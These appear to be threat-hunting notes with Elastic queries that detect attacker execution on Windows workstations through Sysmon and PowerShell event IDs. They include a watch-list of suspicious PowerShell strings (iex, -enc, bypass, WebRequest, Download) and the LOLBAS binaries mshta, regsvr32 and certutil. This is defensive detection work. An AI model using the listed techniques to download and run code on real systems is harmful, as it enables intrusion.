Execution
Use of command-line tools (powershell, cmd, etc)
Search using the winlog "Process Creation" event ID (1), coupled with the process names of the targeted cli tools:
host.name:WKSTN-* AND winlog.event_id:"1" AND process.name:(cmd.exe or powershell.exe)Alternatively, use the Winlog "Powershell Script Block" event ID:
host.name: WKSTN-* AND winlog.event_id: 4104And then get rid of the noise by eliminating anything that starts with {Set Strict-Mode}
Strings that should be closely monitored include ;
invoke / invoke-expression / iex
-enc / -encoded
-noprofile / -nop
bypass
-c / -command
-executionpolicy / -ep
WebRequest
Download
Use of living-off-the-land binaries/tools (LOLBAS)
Search using the winlog "Process Creation" and "Network Connection" event ids (respectively 1 and 3), coupled with the process names and parent process names of the relevant lolbas binaries : mshta.exe, regsvr32.exe, certutil.exe, etc ...
host.name:WKSTN-* and winlog.event_id:(1 or 3) and (process.parent.name :(mshta.exe or regsvr32.exe or certutil.exe) or process.name:(mshta.exe or regsvr32.exe or certutil.exe))After that, following the PID of the processes generated by those lolbases can be relevant (using fields like process.pid, or process.parent.pid)
Scripting and programming tools
Same concept as the above, except this time we focus on stuff like Python/Nodejs, and other utilities that will be found in dev envs/workstations. You know the drill, winlog events 1 & 3 :
host.name: WKSTN-* AND winlog.event_id: (1 OR 3) AND (process.name: (*python* OR *php* OR *nodejs*) OR process.parent.name: (*python* OR *php* OR *nodejs*))Same as above, following the PID of the processes generated by those tools can be relevant (using fields like process.pid, or process.parent.pid)
Last updated